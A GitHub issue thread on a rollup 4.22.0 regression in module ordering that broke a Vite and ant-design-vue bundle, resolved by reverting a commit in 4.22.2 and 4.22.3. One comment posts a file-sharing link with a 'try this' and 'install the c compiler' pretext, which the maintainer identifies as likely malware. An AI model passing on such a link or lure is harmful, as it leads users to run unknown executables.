### ISSUE TITLE
generate wrong orderedModule

### ISSUE THREAD

**Issue by yuzheng14** [rollup/rollup#5660]
### Rollup Version

4.22.0

### Operating System (or Browser)

MacOS 14.4 (23E214)

### Node Version (if applicable)

22.4.0

### Link To Reproduction

could not reproduce without corparation's assets

### Expected Behaviour

My project bundled by vite uses ant-design-vue@1.7.8, and it import @ant-design/icons-vue@2.0.0. It import babel-runtime like this:

```javascript
import _createClass from 'babel-runtime/helpers/createClass';
```

In babel-runtime, it import core-js like this:

```javascript
// babel-runtime/helpers/createClass
var _defineProperty = require("../core-js/object/define-property");

// babel-runtime/core-js/object/define-property.js
module.exports = { "default": require("core-js/library/fn/object/define-property"), __esModule: true };
```

And in the core-js@2.6.12 is:

```javascript
require('../../modules/es6.object.define-property');
var $Object = require('../../modules/_core').Object;
module.exports = function defineProperty(it, key, desc) {
  return $Object.defineProperty(it, key, desc);
};
```

It is naturally to procede `modules/es6.object.define-property` other than `library/fn/object/define-property`. And actually this is how rollup@4.21.3 works.

### Actual Behaviour

https://github.com/rollup/rollup/blob/5e7a3631a28a863ddb97a64189c3b76eec9983ca/src/Chunk.ts#L1244-L1288

When rendering modules of chunks including `core-js`, the index of `library/fn/object/define-property` in `orderedModules` is about 100, but the index of `modules/es6.object.define-property` is about 1_000.

So that the lines of `modules/es6.object.define-property` in bundle is 10_000 more than `library/fn/object/define-property`.

Then it produce a white screen.

![image](https://github.com/user-attachments/assets/837895cf-7a88-401b-a2e6-6a62419bb3f0)

I tried to reproduce it but failed. I've seen the difference code between 4.21.3 and 4.22.0, I think that https://github.com/rollup/rollup/commit/184bc4e2b1ba6858f482dd23a454254777206ce7 maybe introduce it.

**Comment by nhatlaso1** [comment]
try this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by yuzheng14** [comment]
> try this
> 
> https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
> 
> you may need to install the c compiler

What is this? It's a .exe but my os is MacOS. And why should I need a c compiler?

**Comment by lukastaegert** [comment]
It is likely dangerous malware/spam. Luckily, someone already removed it.

With regard to the issue, I reverted the change that I suspected caused the issue, can you check if 4.22.1 works correctly? We got a potential reproduction via #5661 now that will hopefully allow me to create a proper fix.

**Comment by yuzheng14** [comment]
It's a pity that it doesn't work. I'm trying to revert https://github.com/rollup/rollup/commit/184bc4e2b1ba6858f482dd23a454254777206ce7 to test whether it can bundle successfully.

**Comment by yuzheng14** [comment]
I've reverted https://github.com/rollup/rollup/commit/184bc4e2b1ba6858f482dd23a454254777206ce7 and installed it after bundle it locally. And it works for me. So that I assure it blame on https://github.com/rollup/rollup/commit/184bc4e2b1ba6858f482dd23a454254777206ce7.

**Comment by lukastaegert** [comment]
I reverted the other fix via 4.22.2. However, I still need some kind of reproduction for 4.22.0 as now, the bug that was originally fixed is now open again.

**Comment by lukastaegert** [comment]
See #5669, please give `4.22.3-0` a spin to see if it fixes your issues as well.

**Comment by yuzheng14** [comment]
Both `4.22.2` and `4.22.3-0` work.

**Comment by lukastaegert** [comment]
Closed via v4.22.3
